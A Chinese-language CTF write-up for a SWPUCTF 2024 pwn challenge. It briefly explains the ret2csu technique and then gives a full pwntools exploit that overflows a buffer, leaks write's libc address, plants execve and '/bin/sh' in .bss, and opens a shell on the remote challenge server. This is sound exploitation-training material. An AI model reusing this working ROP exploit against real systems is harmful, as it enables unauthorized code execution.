Problem: [SWPUCTF 2024 秋季新生赛]出题人你到底干了什么?
思路
- 解题大致思路
- 套ret2csu的模板即可
- 需要注意这里
- 如果选取的gadget1不是0x40122A而是上面的0x401226就需要在payload += p64(gadget1_addr)后面加一个p64(0)来抵消add rsp,8
EXP
-
具体攻击代码
from pwn import * context.arch='amd64' attachment=ELF("/home/karl/桌面/pwn_practice/ret2csu/loss/attachment") path="/home/karl/桌面/pwn_practice/ret2csu/loss/attachment" libc=ELF("/home/karl/桌面/pwn_practice/ret2csu/loss/libc.so.6") sh=remote("node6.anna.nssctf.cn",25412) #sh=process(path) write_got=attachment.got['write'] read_got=attachment.got['read'] main_addr=attachment.symbols['main'] bss_base=attachment.bss() gadget1_addr = 0x40122A gadget2_addr = 0x401210 def csu(rbx, rbp, r12, r13, r14, r15, ret_addr): payload = b'a' * 104 # to overflow payload += p64(gadget1_addr) payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15) # to set reg value payload += p64(gadget2_addr) # gadget1 ret payload += b'b' * 0x38 # to padding stack payload += p64(ret_addr) # gadget2 -> gadget1 -> ret sh.sendline(payload) sleep(1) sh.recv() csu(0,1,1,write_got,8,write_got,main_addr) write_addr=u64(sh.recv(8)) libcaddress=write_addr-libc.symbols['write'] system_addr=libcaddress+libc.symbols['execve'] sh.recv() csu(0,1,0,bss_base,16,read_got,main_addr) sh.send(p64(system_addr)+b'/bin/sh\x00') sh.recv() csu(0,1,bss_base+8,0,0,bss_base,main_addr) sh.interactive()
总结
- 对该题的考点总结